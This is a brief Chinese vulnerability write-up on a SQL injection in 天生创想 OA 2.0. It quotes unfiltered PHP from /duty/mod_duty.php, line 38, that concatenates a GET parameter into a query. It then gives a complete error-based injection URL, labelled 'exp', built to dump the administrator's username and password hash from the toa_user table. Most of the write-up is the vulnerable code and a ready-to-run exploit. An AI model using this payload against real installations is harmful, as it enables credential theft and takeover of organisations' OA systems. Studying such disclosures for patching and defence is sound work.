天生创想oa2.0前台用户sql注入2

摘要

文件/duty/mod_duty.php
行38
[php]
if ($number = getGP('number','G')) { //获取参数$wheresql .= " AND number=".$number.""; //没有进行过滤，组合进了sql语句

文件

/duty/mod_duty.php
行38
[php]
if ($number = getGP('number','G')) { //获取参数

$wheresql .= " AND number=".$number.""; //没有进行过滤，组合进了sql语句

//echo $wheresql;

$url .= '&number='.rawurlencode($number);

}

[/php]

造成注入，可报错，注入获取管理员账号密码

前台用户登入后

执行exp

[php]http://0day5.com/admin.php?ac=duty&fileurl=duty&menuid=31&number=123%20and%20(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(username,password)%20FROM%20toa_user%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)[/php]

爆出管理员账号密码